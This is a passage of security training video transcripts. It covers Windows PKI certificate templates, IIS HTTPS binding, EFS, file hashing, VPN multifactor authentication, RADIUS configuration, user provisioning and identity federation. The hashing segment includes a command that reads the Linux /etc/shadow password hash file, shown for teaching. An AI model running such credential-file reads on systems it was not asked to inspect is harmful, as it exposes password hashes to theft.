contains the fakedomain-SRV2012-1-CA node, which further includes the Revoked Certificates and Certificate
Templates folders. The section on the right displays the content of the folder selected in the left section.] on the
left, I'm going to expand the name of my CA and I'm going to choose Certificate Templates. [The contents of
the Certificate Templated folder are displayed in the section on the right. It displays a list of templates and
their intended purposes.] Now we don't have a web server template here from which we can issue PKI
certificates.
So, to do that, I'm going to right-click on Certificate Templates on the left and choose Manage, which opens up
a new tool called the Certificate Templates Console. [This window is divided into three sections. The section in
the left contains the Certificate Templates node, which is selected by default. A list of generic templates is
displayed in the middle section. The section on the right is titled Actions.] Now, in this list, we've got a bunch
of generic templates, one of which in the Ws is called Web Server. So I want to right-click on that one and
choose Duplicate Template. [The Properties of New Template dialog box opens. It includes the General,
Subject Name, Cryptography, and Security tabs. At the bottom of the dialog box are several buttons such as
OK and Cancel.]
And, under the General tab, I'm going to give this a new name. It's going to be called Custom Web Server
Template. [He enters this name in the Template display name text box.] Now this is going to be the generated
PKI certificate of course. Down below, there are many other things that I can configure such as the Validity
period of the certificate. Here it's set to 2 years, which is fine. Under Subject Name here – in this case, the
name of the server that will receive the certificate – it's set to Supply in the request.
So that means that when we request the certificate, we'll have to supply the name. There are many other things
we could do here. For instance, under Cryptography, I might set the Minimum key size because remember
when a PKI certificate gets issued, there is a mathematically related public and private key pair.
So I'm going to go into the Security tab where I'm going to click the Add button. [The Select Users,
Computers, Service Accounts, or Groups dialog box opens. It includes the Object Types and Check Names
buttons.] And, for Object types, [He clicks the Object Types button and the Object Types dialog box opens. It
includes the Computers checkbox.] I'll select Computers. I'll click OK. Then I'm going to type in the name of
the server that I want to be able to have privileges to request a certificate from these templates. So that server is
called srv2012-1. [He enters this name in the Enter the object names to select text box under the Select Users,
Computers, Service Accounts, or Groups dialog box] I'll check the name and OK it. And, having that name
selected here in the ACL for this template, I'm going to make sure I turn on Enroll under the Allow
column. [He selects the Allow checkbox for the Enroll permission under the Permissions for SRV2012-1
section of the Security tabbed page.]
So SRV2012-1 is allowed to Enroll and essentially ask for a certificate based on this template. I'll click OK.
And I'll Close the Certificate Templates Console. [He switches back to the certsrv window.] Now the thing is
our Custom Web Server Template isn't showing up on the right, and that's normal. What you need to do to
make it usable is you need to right-click on Certificate Templates on the left. You need to go to New -
Certificate Template to Issue and then choose it from this list. There it is – Custom Web Server Template. We
are good to go.
Now let's play the part of the server that will request a certificate based on that template, which usually would
be a different computer. But, in our example, we'll just use the same computer. It won't make a difference. So
we're going to go ahead and go to the Start menu and type mmc.exe to start the Microsoft Management
Console tool. [The Console1 window opens. It is divided into three sections. The section in the left contains the
Console Root folder. The section in the middle displays the content of the folder selected in the section on the
left. The section on the right is titled Actions.] Now what I'm going to do here is add the certificate snap-in, so
we can work with certificates on this computer.
To make that happen, I'm going to go to the File menu. I'm going to choose Add/Remove Snap-in. [The Add
or Remove Snap-ins dialog box opens. It includes two list boxes. The first list box displays a list of available
snap-ins. The second list box displays a list of selected snap-ins. There is an Add button in the middle of these
list boxes that adds the selected snap-in from the first list box to the second list box.] I'm going to choose
Certificates on the left. Then I'll click Add in the middle. [A wizard opens. The first page is titled Certificates
snap-in. It contains a section, which is titled This snap-in will always manage certificates for. This section
includes the Computer account radio button. At the bottom are three buttons: Back, Next, and Cancel.] And
I'll choose Computer account, Next. [The next page is titled Select Computer. It includes a section that is titled
This snap-in will always manage. It further includes the Local computer radio button.] I'll leave it on Local
computer. And I'll click Finish. Finally, I'll click OK [in the Add or Remove Snap-ins dialog box] . And now
you can see that we've got the Certificates tool available or added to MMC. [The Certificates (Local
Computer) node gets added under the Console Root folder in the left section of the Console1 window.] So we
can now work with certificates for this computer.
In the left-hand navigator, [The Certificates (Local Computer) node further includes folders such as Personal
and Enterprise Trust.] I'm going to expand Personal, then I'm going to click Certificates where on the right, I
will see any existing certificates issued to this host. [The content of the Certificates subfolder is displayed in
the middle section.] To request a new certificate in the left-hand navigator, I will right-click on Certificates
and choose All Tasks - Request New Certificate. On the Certificate Enrollment screen – which is a wizard – I'll
click Next and Next again. And here we can see we can choose our Custom Web Server Template, [He selects
the Custom Web Server Template checkbox in the Request Certificates page.] but it says more information is
required.
So I'm going to click on that link. [The Certificate Properties dialog box opens, which includes the Subject
tab. It further includes the Subject name and Alternative name sections. Both sections contain a Type drop-
down list box and a Value text box. There are two buttons, Add and Remove, adjacent to both these
sections.] Now, for the Common name, I'm going to type in the name of my server – srv2012-1, [He types this
in the Value text box under the Subject name section.] and I will click Add. And, for the Alternative name
down below, I'll choose DNS [He selects this value in the Type drop-down list box.] and I'll put in srv2012-
1.fakedomain.local. [He types this in the Value text box.] Now we ping that at the onset of this demonstration
to make sure it was valid, and it was. I'll click Add. So essentially, this is going to be added into the PKI
certificate that gets issued for this server. So I'll click OK, and then I'll click the Enroll button. [This button is
present at the bottom of the Request Certificates page of the Certificate Enrollment wizard.]
And now it says the STATUS: Succeeded. So therefore I'll click Finish. I can see that I've got a certificate now
in this list that's been issued to this server from the template. [This certificate appears in the middle section of
the Console1 window.] I can see the Expiration Date. I can see the Intended Purposes. And actually, I could
even double-click on that certificate where I might even go into Details to see things like what's the subject
name. There is the subject name – the name of the server. If I go further down, I can even see things like the
Subject Alternative Name is the DNS name of the server of course and so on. So let's actually use that
certificate. And this host happens also to be a web server. We're going to do it on the same computer again.
In my Start menu, I'm going to type iis so that I can start the Internet Information Services (IIS) Manager tool
to manage web sites. It also actually lets me manage FTP sites. [The Internet Information (IIS) Manager
window opens. There is a section on the left, which is titled Connections. It includes the Start page node,
which further includes the SRV2012-1 (FAKEDOMAIN\Administrator) subnode. This subnode includes the
Sites folder, which further includes the Default Web Site option.] But we're worried about our Default Web
Site here and securing it with HTTPS. So you need a certificate for that. Well, we've got a certificate.
I'm going to right-click on the Default Web Site and choose Edit Bindings. [The Site Bindings dialog box
opens. It includes the Add and Edit buttons.] Here you can see our web server has a Port 80 binding, but not a
Port 443 binding, which is normally used for secured connections over HTTPS. So I'm going to click the Add
button. [The Add Site Binding dialog box opens. It includes the Type and IP address drop-down list boxes. It
also includes the Port and Host name text boxes.] And, from the Type drop-down list, I'll choose
https. [Another drop-down list box appears, which is titled SSL certificate.] Notice it's selected Port 443.
Now I have to choose an SSL certificate. So I'm going to go down and choose the one that we just issued here.
Here is the server's common name – srv2012-1. And I will click OK and Close. Now, if I start my web browser
– so I'm going to start Internet Explorer – and if I try to connect to https://srv2012-1, in this
case, .fakedomain.local/, the full DNS name, it takes us right to it. So now our server has an encrypted
connection through the certificate that we requested from the Windows Certificate Authority.
[Topic title: Use Windows EFS File Encryption. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to use Windows encrypting file system. Encrypting file system, or EFS, is built into the
Windows operating system. And it allows users to encrypt files and folders. So that user then must be
successfully authenticated before decryption can occur. So therefore, it's based on the user unlike BitLocker,
which is really tied to the machine. And it protects data at rest or data while the machine is turned off and the
disk volume is encrypted still.
So the first thing we should always do is get some kind of context. And what that means here is I'm going to
type whoami to see who I'm currently logged in as. [The presenter types this in the PowerShell window.] In
this case, I'm logged in as the administrator account in the domain called fakedomain. Now this is important
because any files that I encrypt will be encrypted with whoever I'm currently authenticated as. So now that we
know that information, let's go ahead and take a look at what we need to do to make EFS file encryption work.
I'm going to open up Windows Explorer where I'm going to take a look at a sample file on drive I. So let me
just go into the UserDataFiles folder - Projects. Now I could encrypt an entire folder, but here I'm just going to
choose a single file called Project_A. I'm going to right-click on that file and choose Properties. [The
Project_A Properties dialog box opens.] In the Properties, I'm going to go down under the Advanced
button [He clicks the Advanced button and the Advanced Attributes dialog box opens.] where I can see it's not
currently encrypted, because there is no checkmark for the option that says Encrypt contents to secure data.
Now interestingly from the command line, I could also use the cipher.exe tool. So I'll just put a /? after that to
work with EFS encryption here at the command line. [He executes the cipher.exe /? command in the
PowerShell window.] And that's definitely useful if you want to work with things in an automated fashion, if
you want to repeat actions on multiple machines. However, I'm going to Minimize that screen. We're going to
use the GUI here to encrypt this file with EFS. [He switches back to the Advanced Attributes dialog box and
selects the Encrypt contents to secure data checkbox.]
So really it's just a matter of going into the Properties, going into the Advanced button, and turning on this
checkmark to encrypt the contents. Now, when I click OK the second time, [He clicks the OK button in the
Project_A Properties dialog box and the Encryption Warning dialog box opens.] it asks if I would like to
Encrypt the file and its parent folder or just the file. Well, I'm going to choose Encrypt the file only, and then
I'll turn on checkmark to always encrypt only the file. And I'll click OK. Now what this means is that any new
files placed into this folder will not be automatically encrypted. So that's fine.
I'm going to go ahead and OK out of that. And notice that the color of the file has changed because it's now
encrypted. Now, to the user that encrypted it, everything is completely transparent other than the color
changing. If I would open up that file by double-clicking, it just opens up as per usual, whereas anyone else is
going to get an access denied message.
Do take note though, that if you are working on a project – for example – and you want other people to be able
to decrypt that same file, it is possible. So, for instance, if I right-click on the file and go under Properties and
then go down under Advanced and then click on Details, [He clicks the Details button in the Advanced
Attributes dialog box and the User Access to Project_A dialog box opens.] from here I could click Add to add
other people that should be able to decrypt the same file. [He clicks the Add button and the Encrypting File
System dialog box opens.]
Now, in order for me to do that, I have to make sure I have access to their certificates. Now certificates –
what's that about? Well, in the background, what encrypting file system is doing is using a PKI certificate
issued to the user for encryption. Now either you can control that yourself or if the user doesn't already have a
PKI certificate the first time they encrypt file, it will be auto-generated, which is what will have happened here.
Let's go take a look at that. So, to verify that this is true, I'm going to start the Microsoft Management Console
or MMC. And we're going to add the certificate snap-in and look at the user certificate. So, in my Start menu,
I'm going to type mmc.exe. There it is. So I'm going to click on it. [He opens the Console1 window.] And I'll
maximize it. And I'll go to File menu. I'll choose Add/Remove Snap-in. [The Add or Remove Snap-ins dialog
box opens. It includes two list boxes. The first list box displays a list of available snap-ins. The second list box
displays a list of selected snap-ins. There is an Add button in the middle of these list boxes that adds the
selected snap-in from the first list box to the second list box.] On the left, I'll choose Certificates. Then I'll
click Add. [The Certificates snap-in dialog box opens that contains a section named This snap-in will always
manage certificates for. This section includes the My user account radio button.] And I want it for the user
account. So I'll leave it on My user account, Finish, and OK.
Alright, finally, after all those steps in our console on the left, we can see certificates for the current user. So I
will expand that as well as expanding Personal. Then I'll click on Certificates on the left. [He selects the
Certificates subfolder in the left section of the Console1 window and its content is displayed in the middle
section.] Notice here, I've got a certificate issued to my user account, Administrator. Now, because I've got a
Certificate Authority installed, that was issued by my Certificate Authority in the Active Directory domain.
And notice that the Expiration Date is listed here. And notice, this is the key here, no pun intended – the
Intended Purposes for encrypting file system. So this certificate then is what is used to encrypt and decrypt
files based on this user account. So it's crucial that that be backed up.
Now the safety net in an Active Directory domain environment – should PKI certificates be corrupt or not
backed up and stations destroyed? Is that the domain administrator is by default an EFS recovery agent? And
you can configure other accounts as recovery agents in Group Policy. And what that means then is that the
EFS recovery agent can decrypt anyone's data if absolutely required. In this video, we learned how to use
Windows EFS file encryption.
[Topic title: Fingerprinting, Hashing. The presenter is Dan Lachance.] In this video, I'll talk about
fingerprinting and hashing. A hash is a short value that uniquely represents original data. Hashing uses one-
way functions that are not feasibly reversed without knowledge of the original data. Hashing is also an
efficient way of detecting modification, especially across the network between multiple nodes without having
to transmit all of the original data. Instead, hashes can be computed on different devices. And the hashes
themselves – which are much smaller potentially than the data they are based on – are what would be sent and
compared over the network.
Hashes are normally at least 128 bits long. And they are sometimes called message digests. We can compute a
hash of data and then compare that to an earlier hash of that data to detect if any changes have occurred. And
this is actually done quite often with forensic evidence gathering to ensure that prior to forensic experts
conducting analysis on seized information, we have a record of its original state.
Ways that hashing gets used include password hashing in the UNIX and Linux /etc/shadow file. Here, in
Linux, I'm going to type cat /etc/shadow. [The presenter executes this command in the root@kali command
prompt window.] In UNIX and Linux environments, the shadow file will have user account information along
with hashed passwords. Now I'm going to clear the screen and bring up that command again with the up arrow.
But I'm going to pipe it to grep, which is a line filter. And we're going to look for the root user account. [He
executes the cat /etc/shadow | grep root command.]
What you're going to notice here is in the second placeholder – here because the delimiter is a colon – here we
have a hashed version of the root password. Now you can't enter in the hash to authenticate as that user. That's
not going to work. However, there is an algorithm that's used upon logon where the password is fed through a
hashing algorithm. And, if it results with this unique hash, then the password is then correct.
Hashing is also often used for file integrity verification. We can also verify that downloaded Internet files
haven't been corrupted during download by doing a hash after we've downloaded it on our local machine and
comparing it to a hash published on a web site. For instance , the shasum command line tool can be used in
Mac OS X to ensure downloaded files have not been corrupted or tampered with. You'll learn how to perform
hashing in Linux and Windows in other demonstrations. Common hashing algorithms include MD5 – that's
message digest 5; RIPEMD; and the secure hashing algorithm family such as SHA1, SHA2, and SHA3. In this
video, we discussed fingerprinting and hashing.
[Video description begins] Topic title: File Hashing in Linux. The presenter is Dan Lachance. [Video
description ends]
In this video, I'll demonstrate how to perform file hashing in the Linux operating system. Hashing allows us to
run some kind of a computation on originating data to see if it's changed since the last time we ran that same
computation. Here, in Linux, I'm in my data directory where I'm going to type ls to list files. I can see I've got a
file here called log1.txt. So why don't we take a look at what's inside it using the cat command?
[Video description begins] The presenter executes the cat log1.txt command. [Video description ends]
So there's a single line of text that says, "This is sample data on line one." What I'm now going to do is use the
md5sum command, spacebar, then I'll put in the name of my file. And notice that I get the resultant hash.
[Video description begins] He executes the md5sum log1.txt command. [Video description ends]
Now what I could do is use output redirection to store this hashed information in a file. So, for instance, I'll use
the up arrow key to bring up that command. I'll use a greater than sign, which is my output redirection symbol.
And maybe in the current directory, I'm going to make a file called log1hash.
[Video description begins] He executes the md5sum log1.txt > log1hash command. [Video description ends]
Now, when I press Enter, I don't get the output on the screen anymore, but I do have a log1hash file. If I cat the
log1hash file to view the contents within it, then I'm going to see that I've got my hash information along with
the filename.
[Video description begins] He executes the cat log1hash command. [Video description ends]
So let's go ahead then and make a change to the contents within log1.txt. To do that, I will use the Fantasy VI
text editor, so vi log1.txt. Now, in here, I'm going to the end of the line, going to press Insert. And I'm going to
press Enter where I'll type "This is line two." I'll then press Esc so that I'm no longer in INSERT mode. Now
I'm in command mode, so things I type in don't become part of the file, they're interpreted as commands in the
VI editor. So I'm going to type :wq. And you'll see that showed up in the bottom-left where w means write –
write the changes to the file – and q means quit. So now I'm going to use my up arrow key back to the md5sum
command originally against log1.txt. Let's go ahead and run it. Now notice that this time
[Video description begins] He again executes the md5sum log1.txt command. [Video description ends]
if you look carefully at the resultant hash, it begins with c2d2. That of course is different than the original hash,
which began with 53d4. So the point is this, hashing lets us detect when a change has occurred – in this case, to
a file in the Linux filesystem. In this video, we learned how to work with file hashing in Linux.
Objectives
[Topic title: File Hashing in Windows. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with file hashing in the Windows environment. Now why would we ever want to hash a file? What is the
purpose? The purpose is to simply detect if a change has occurred since we last ran the computation that
resulted in the hash. Now, in the Windows world, we can use third-party command line and GUI tools or what
I'm going to demonstrate here is using PowerShell with the built-in Get-FileHash cmdlet. But first let's start by
typing dir.
Here we've got a working file called Project1.txt. So let's just use notepad to open that up to see what's inside
it. [The presenter executes the notepad .\Project1.txt command and the Project1.txt - Notepad window
opens.] It's got one line of text that says "This is line one." Okay, so that's what we've got to work with. Now
what I'm going to do is I'm going to use the Get-FileHash cmdlet – so get-filehash. Now, unlike Linux of
course, PowerShell is not case sensitive. And I'll give it the name of the file I want to run a hash of. That would
be Project1.txt. [He executes the get-filehash .\Project1.txt command.] And we can see the unique SHA256
hash value that's been returned.
Now, much like I can in other environments – like in Linux shells – I can redirect output of that command to a
file for future reference, which is exactly what I want to do. I'm going to use the up arrow key to bring up that
command. And, at the end, I'm going to use the greater than symbol because that will take the screen output
and capture it and dump it into a file instead, which I'm going to call project1hash. [He executes the get-
filehash .\Project1.txt > project1hash command.]
So, if I were to run notepad now against the project1hash file, [He executes the notepad .\Project1hash
command and the project1hash - Notepad window opens.] then we would see – of course – it contains the
SHA256 algorithm listing along with the actual hash and the name and path of the file. Excellent. Notice that
the hash starts with 227AB28. So now what we're going to do is Close that up. And instead, we're going to use
notepad to open up the project1 file – that's the origin data. [He executes the notepad project1 command and
the Project1.txt - Notepad window opens.] And we're going to make a change.
Took it to other line, this says "This is line two." And I'm going to go ahead and Close and Save that. And
we're going to recompute the hash again. So, to do that...and actually we're simply going to use get-filehash,
and it's going to run against Project1.txt. [He again executes the get-filehash .\Project1.txt command.] Now we
can tell immediately that we have a different returned hash value because now our current returned hash begins
with 082AC where before it started with 227AB28.
So we can now safely say that indeed that file has changed since we last ran the hashing algorithm because we
have a different hash-resultant value. Now you can also use this when you download files from the Internet
because some web pages will publish a hash value. And, to make sure that you downloaded the right file and
that it has not been tampered with or corrupted, you can run a hashing tool like this one to make sure you get
the same hash posted on the web site. In this video, we learned how to run file hashes in Windows.
Objectives
[Topic title: Authentication. The presenter is Dan Lachance.] In this video, we'll discuss authentication.
Authentication is a core part of Identity and Access Management. And it really means proof of identity
whether we're talking about a user, a device, or an application. Authentication has multiple categories that can
be used such as something you know. That would include something like a username and a password or a PIN.
Another category for authentication is something you have. That would include things like a PKI certificate or
a hardware or software token or even a smart card. The third category is something you are for biometric
authentication. This will include things like fingerprints, voice recognition scans, or retinal scans. Multifactor
authentication is often referred to as MFA. It's a combination of at least two authentication categories. So, for
example, something you know like a PIN and something you have like your smart card. So together you can
use that information and that device for authentication.
Multifactor authentication does constitute at least two authentication categories, but the two items cannot be in
the same category. That would not constitute MFA. So, for example, username and password are two items,
but they are the same category. They're both something you know. So therefore, username and password are
not considered multifactor authentication.
With authentication, we need an identity store. So think of things like user accounts. Where are they stored? So
user accounts then might be stored in an LDAP-compliant database such as Microsoft Active Directory
Domain Services databases. We can also configure RADIUS authentication, which allows for a centralized
authentication provider.
Edge devices like network switches and VPN appliance will forward their authentication requests from their
clients to the RADIUS server. So, in other words, edge network devices like switches, VPN appliances,
wireless routers, they would not perform authentication, instead they forward it to the RADIUS server which
does the authentication.
Identity Federation is a centralized, trusted identity provider where we have a single copy of credentials. So
applications then themselves do not perform authentication, instead they forward authentication requests to the
identity provider. In turn, the identity provider then sends a digitally signed security token to the app after
successful authentication.
Security tokens can contain what are called claims about users or devices. A claim is basically an assertion
about a user or device such as a date of birth, a department a device resides in, and so on. Identity federation is
often used for Web Single Sign-on for internal or public cloud apps so that users don't have to keep re-entering
the same credentials as they access different applications.
Finally, authentication can also be context based. So, in addition – for example – to a smart card and a PIN, we
might look at the time of day to determine if someone is allowed to authenticate or their location, which could
be based on GPS tracking or the frequency of how often they authenticate or other behavioral characteristics.
In this video, we discussed authentication.
Objectives
[Topic title: Configure MultiFactor Authentication for VPN Clients. The presenter is Dan Lachance.] In this
video, I'll demonstrate how to configure VPN multifactor authentication. Multifactor authentication can be
required for VPN connectivity. Now, if you think about it, your VPN appliance is in some way exposed to the
public Internet to allow incoming VPN connections in the first place. So usually, we want more than just
standard username and password, which constitutes single-factor authentication.
Instead, what we're going to do here is configure multifactor authentication through the use of a smart card
where the user must have the smart card in their possession and they must know the PIN in order to
authenticate the VPN. Now, depending on your VPN solution, the specific steps will vary. We're going to do it
here in the Windows Server 2012 environment.
So, from the Start menu, I'm going to type network so that I can start the Network Policy Server tool. Now, if
you're using a Windows Server as a VPN device, then this is the software that will make it happen. Also, this is
where you configure your RADIUS server settings for centralized authentication because as we know, VPN
appliances themselves should never actually do the authentication locally, in case they get compromised.
So here in the Network Policy Server tool, [The Network Policy Server window is divided into two sections.
The left section contains the NPS (Local) node. It further includes the Policies subnode. This subnode includes
the Connection Request Policies folder. The section on the right displays the content of the folder selected in
the left section.] over on the left I'm going to expand Policies. And I'm going to go ahead and right-click after I
select Connection Request Policies. There I'm going to choose New. [The New Connection Request Policy
wizard opens. The first page is titled Specify Connection Request Policy Name and Connection Type. It
includes the Policy name text box and Type of network access server drop-down list box.] And I'm going to
call this Incoming VPN Smartcard. [He types this in the Policy name text box.] Now, down below for the Type
of network access server that this connection request policy will be used for, I'm going to choose Remote
Access Server(VPN-Dial up).
Even though my users aren't using dial-up modems, they're connecting over the Internet. And I'll click
Next. [The next page of the wizard is titled Specify Conditions. It includes the Add button.] Now here in the
Specify Conditions dialog box, I'm going to click the Add button. [The Select condition dialog box opens. It
includes the Tunnel Type option. There is the Add button at the bottom of the dialog box.] And, in this case,
notice I have got multiple criteria I can select, but I'm going to just choose the Tunnel Type. [He clicks the Add
button and the Tunnel Type dialog box opens. It includes the Common dial-up and VPN tunnel types section,
which further includes the Layer Two Tunneling Protocol (L2TP) checkbox.] I want to specifically say here
that I only accept connections here for Layer Two Tunneling Protocol (L2TP) assuming that's what my VPN
appliance is configured with because here I'm not actually configuring the VPN appliance, I'm just configuring
the requirement for multifactor authentication.
So I'm going to go ahead and click OK, and I'll click Next. [The Specify Connection Request Forwarding page
of the wizard opens. It includes the Authenticate requests on this server radio button.] Now, at the RADIUS
level, here I can determine whether authentication requests should be handled on this server, which is what I
want because this is actually my RADIUS server with Active Directory user accounts. But notice I do have the
option of forwarding requests to a different RADIUS server. Well, I would have the option if I had additional
servers. Right now it's currently grayed out.
So I'm going to go ahead and click Next on the screen. I didn't change anything. Now, on the Specify
Authentication Methods screen, this is where we're going to do the work to specify that VPN clients must use
multifactor authentication. [This page of the wizard includes the Override network policy authentication
settings checkbox.] So, to do that, I'm going to turn on the checkmark here for the option that says Override
network policy authentication settings because we're going to specify them here.
Now, under EAP Types, I'm going to click the Add button. EAP, of course, stands for Extensible
Authentication Protocol. [The Add EAP dialog box opens. It includes the Microsoft: Smart Card or other
certificate option.] And what I want to choose here is Microsoft: Smart Card or other certificate. So I'm going
to choose that and click OK. And then I'll proceed through the wizard by clicking Next. Now I don't need to
specify any other attributes. So I'll just continue through the wizard until I get to my summary screen where I
will click Finish.
[Now the content of the Connection Request Policies folder includes the Incoming VPN Smartcard policy. Its
status is Enabled and source is Remote Access Server(VPN-Dial up).] So now I've got a connection request
policy whereby it requires multifactor VPN authentication through the use of a smart card. Now this is going to
be used when we've got VPN appliances that forward RADIUS authentication requests to this device. In this
video, we learned how to configure VPN multifactor authentication.
[Topic title: Authorization. The presenter is Dan Lachance.] In this video, I'll talk about authorization.
Authorization occurs after successful authentication of a user, a device, or an application. Authorization allows
access to a resource such as a network, a web application, a file, a folder, a database, and so on. Access control
lists – or ACLs – control resource access. With authorization, it's important to adhere to the principle of least
privilege where permissions are granted – only those that are required to complete a job task and no more.
There also should be a periodic review of access privileges to ensure that they are still sufficient. Or, in some
cases, to ensure that too many permissions are now not the issue. Examples of privileges would include things
like read, write, delete, the ability to modify attributes – for instance – of a file, or to insert a row in a database.
Windows NTFS standard file system permissions include full control, modify, read and execute, list folder
contents, read, write, and special permissions.
Now most of these are pretty self-explanatory. If you have full control, you can do anything you want to the
file. If you have read access, you can read the contents. However, modify and write are a little bit more of a
mystery. A big distinction between modify and write is that modify allows file deletion and write does not.
Special permissions give you a further degree of granularity. For instance, you might want to allow the
creation of folders in a certain location on a server, but not files. Now, if you use the standard permission set
such as the write permission, well that allows the creation of both folders and files. So special permissions lets
you get much more granular.
In Linux standard file system permissions include read, write, and execute. Now read has a value of four, write
has a value of two, and execute has a value of one. So, for example, for the owner of a file if she had all of
these permissions, then numerically that would be four plus two plus one which equals seven.
[Topic title: RADIUS, TACACS+. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
configure a Windows RADIUS server. So a RADIUS server then is a centralized authentication host. And, to
make that happen on a Windows Server 2012 R2 machine, we need to make sure we have the Network Policy
Server role installed. So, here in PowerShell on my Windows computer, I'm going to run the get-
windowsfeature command and I'm going to pad the word policy with wildcard asterisk symbols. In other
words, to get a list of Windows features that contain the word policy. [The presenter executes the get-
windowsfeature *policy* command.]
And here we can clearly see in fact that the Network Policy Server role is installed because there is an [X] in
the box. So the next thing we will do then is start the Network Policy Server GUI tool to configure the
RADIUS server. So, from my Windows Start menu, I'm going to search for the word network. And, when the
Network Policy Server tool shows up, we would go ahead and click on it.
So this is the tool then that we use when we want to configure our Network Policy Server or specifically our
Windows RADIUS server. [The Network Policy Server window opens. The window is divided into two
sections. The left section includes the RADIUS Clients and Servers folder.] So, in the Network Policy Server
tool, the first thing I'm going to do over the left is expand the list of RADIUS Clients and Servers. Now the
idea here is I have to define one or more RADIUS Clients that will forward authentication requests to this
RADIUS server.
So, by virtue of this server having this software installed and being connected to Active Directory, it can act as
a RADIUS authentication server. So, in the left-hand navigator, I'm going to click on RADIUS Clients which
is underneath RADIUS Clients and Servers. [He selects the RADIUS Clients option under the RADIUS Clients
and Servers folder and its content is displayed in the section on the right.] And we see on the right that we
don't have any RADIUS Clients defined.
Now remember a RADIUS client is not the end user trying to connect to the network, for instance, through a
VPN, through an Ethernet switch, or through a wireless router. Instead the RADIUS client is the EdgePoint
network device like the VPN appliance or the wireless router or the Ethernet switch. So they have to be added
here so that they are known by the RADIUS server.
So we're going to right-click on RADIUS Clients and choose New. [The New RADIUS Client dialog box
opens. It includes the Name and Address section, which further includes the Friendly name and Address (IP or
DNS) text boxes. The dialog box also includes the Shared Secret section, which further includes the Shared
secret and Confirm shared secret text boxes.] And, for this first name, I'm going to call it VPN Appliance
1 [He types this in the Friendly name text box.] and I'm going to go ahead and pop in the IP address of my
VPN appliance. [He enters 200.2.35.6 in the Address (IP or DNS) text box.] Now, down below, I'm going to
manually put in a Shared secret that I have to configure on the VPN appliance. This is used for the VPN
appliance to authenticate to this RADIUS server.
So I'm going to go ahead and click OK. [As a result, the VPN Appliance 1 RADIUS Client gets added to the
content of the RADIUS Clients option.] Let's add another one. I'm going to right-click on RADIUS Clients on
the left-hand navigator again and choose New. This time I'm going to call this one wireless access point or
WAP 1. [He types this in the Friendly name text box.] And, in the same way, I'll put in the IP address. But
notice I could put in the actual DNS name of that host if it's configured. [He enters 200.34.67.4 in the Address
(IP or DNS) text box.] And, once again, I can configure either the same or a different Shared secret.
You'll notice that we can build a template where this stuff is just selectable from the list. [He points to the
Select an existing Shared Secrets template drop-down list box under the Shared Secret section.] So, if we
know we are going to configure dozens of VPN or wireless access point clients with the same Shared secret,
maybe it makes sense to build the template first. But here I've only got two. So I don't mind popping in the
same Shared secret. And I'll go ahead and click on OK. [As a result, the WAP 1 RADIUS Client gets added to
the content of the RADIUS Clients option.]
So, now at this point, we've actually got our Windows RADIUS server configured along with two VPN clients.
Now, if we didn't have the network policy role installed, we can either use the server manager GUI to do it. Or,
here in PowerShell...let's just search for PowerShell and fire it up instead of the get-windowsfeature cmdlet, we
would use the install-windowsfeature cmdlet followed by the name of the specific component that we wish to
install.
And remember, if you are not sure about what the nomenclature is for this stuff, just go ahead and search for
like this – so get-windowfeature. Again I'm going to search for the word policy. I'm just guessing – it's
Network Policy Server. And of course you need to spell things correctly. It's get-windowsfeature, not
window. [He executes the get-windowsfeature *policy* command. The output is displayed in a tabular
form.] We can see that it's called over here under the name column NPAS-Policy-Server. So that's what we
would use with the install-windowsfeature cmdlet if we needed to install the software if it's not already there.
Objectives
[Topic title: User Provisioning and Deprovisioning. The presenter is Dan Lachance.] In most cases, accessing
a network resource requires a user account. In this video, we'll talk about user provisioning and
deprovisioning. Provisioning would be used for newly hired employees where there is a standard onboarding
process for those new hires, which would include reviewing and signing of acceptable use policies, user
awareness and training about security issues, how to conduct themselves in the corporate environment, and so
on.
Deprovisioning would involve activities such as conducting an exit interview or removing access. For
example, disabling a user account once they've left the company versus deleting their user account. We might
do that so we can still track what they did or take a look at any work they were working on. Or, in some cases,
even decrypt things that were decrypted with their user account.
Another way to remove access with user deprovisioning is to revoke an associated PKI certificate or
certificates issued to the user and/or devices that they used. For instance, if a user was issued a company
smartphone that could connect to the VPN, that smartphone might use a PKI certificate to authenticate the
VPN. Well, if that certificate is revoked, it can't connect to the VPN anymore.
Common tasks with user provisioning and management overall down to deprovisioning include the creation of
the user account, the modification of the user account while it's in use, for instance, changing attributes such as
last name if somebody gets married or changing a password if it's forgotten. There is the disabling of a user
account. This might be done, for instance, if a user is on sick leave or parental leave. And finally of course
there is user account deletion.
Data from other human resource apps can also be used or integrated with a current solution that might be used.
For instance, we might link Active Directory user accounts with the PeopleSoft application. With user account
creation, users are normally then added to groups after they have an account. Now this is based on their
required access to resources to complete job-specific tasks.
Password policies are also a part of user provisioning, although this is normally automated. For instance, in an
Active Directory environment, we would have a domain Group Policy object that applies to everybody in the
domain so that we have the same password policy in effect. So it would include things like the minimum and
maximum password ages, a minimum password length, password complexity, and so on.
Now, that's not to say that in an Active Directory environment, you can't have password settings for different
groups of users. You can, just not through Group Policy, instead you would configure fine-grained password
policies. In some cases, it's appropriate to use self-service user provisioning where users can request an
account and they can set their own password.
An example of this that we've all come across at some point I'm sure is using a web site that requires a user
account before you can participate in the web site. So, in some cases, you will be able to create a free account
where you can also set your own password. So that's an example of self-service user provisioning.
[Topic title: Identity Federation. The presenter is Dan Lachance.] In this video, we'll talk about identity
federation. Identity federation is related to identity management where we have a centralized identity provider.
This removes the need for redundant user account information. And it also gets configured to trust relying
entities. A relying entity, for example, might be a web application server that we will authenticate user access
to.
Resources are configured to trust the identity provider. And, again, that's an example of a relying entity such as
a web application. So this is often also called a relying party. And normally what's done is the public key from
a certificate or key pair used by the identity provider is made available to the relying party.
Applications don't perform authentication, instead they forward the authentication requests from users to the
trusted identity provider for which they now have a public key. So the identity provider then sends a digitally
signed security token to the app after successful authentication for the user or device.
Now the identity provider's private key creates the signature. Apps have the public key that's related so they
can verify the signature for authenticity. Identity providers generate security tokens. This is often referred to
the specific component on the identity server as a Security Token Service or STS. Security tokens can contain
claims about users or devices.
Claims are assertions that are consumed by apps. So an example might be a date of birth, the department a
device resides in, a user's e-mail address, and so on. The identity provider is also often referred to as a claims
provider as a result of this. This is often used for Web Single Sign-On – SSO – for internal or public cloud
applications so that users don't have to keep providing the same credentials even though they are connecting to
different apps.
There are many benefits to using identity federation, including a reduced cost because we have a single central
identity store, reduced complexity for the same reasons, enhanced security because we're using digitally signed
